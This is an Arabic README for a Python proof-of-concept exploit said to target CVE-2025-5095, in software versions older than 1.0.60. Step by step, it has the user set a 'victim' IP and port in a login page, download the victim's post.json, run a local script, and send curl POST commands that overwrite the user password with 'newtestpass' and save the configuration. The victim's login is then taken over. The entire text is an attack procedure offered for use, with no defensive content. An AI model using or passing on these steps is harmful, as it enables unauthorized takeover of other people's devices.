
POC بلغة بايثون لثغرة CVE-2025-5095
كيفية الاستخدام:
افتح Login.htm وعدّل الأماكن التي يوجد فيها IP:PORT لتصبح عنوان الضحية
عدّل الجزء var LoginVersion = "Check On The Victim Site"; إلى إصدار صفحة الضحية، وبهذا يمكنك زيارة صفحة الضحية وعرضها كمصدر تحذير: يعمل هذا CVE فقط على الإصدارات الأقدم من 1.0.60
قم بتنزيل ملف post.json من موقع الضحية (http://victimip:port/post.json) انقله إلى مجلد السكربت وسيكون لديك 3 ملفات
الآن قم بتشغيل ملف بايثون وادخل إلى 127.0.0.1:8080/login.htm (إذا كان المنفذ 8080 مستخدمًا بالفعل، يمكنك تغييره بفتح السكربت في محرر نصوص وتعديل الجزء الأخير)
تجاهل التنبيه عند فتح صفحة تسجيل الدخول
افتح الطرفية واستخدم أوامر curl التالية، إذا طبع "success" فقد نجح الأمر.
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
للتحقق مما إذا كانت الصفحة قد تغيرت، أرسل هذا الأمر:
curl http://localhost:8080/check_password
الآن، قم بزيارة موقع الضحية (ليس موقع localhost) وأدخل كلمة المرور الجديدة، في هذا المثال كلمة المرور هي "newtestpass"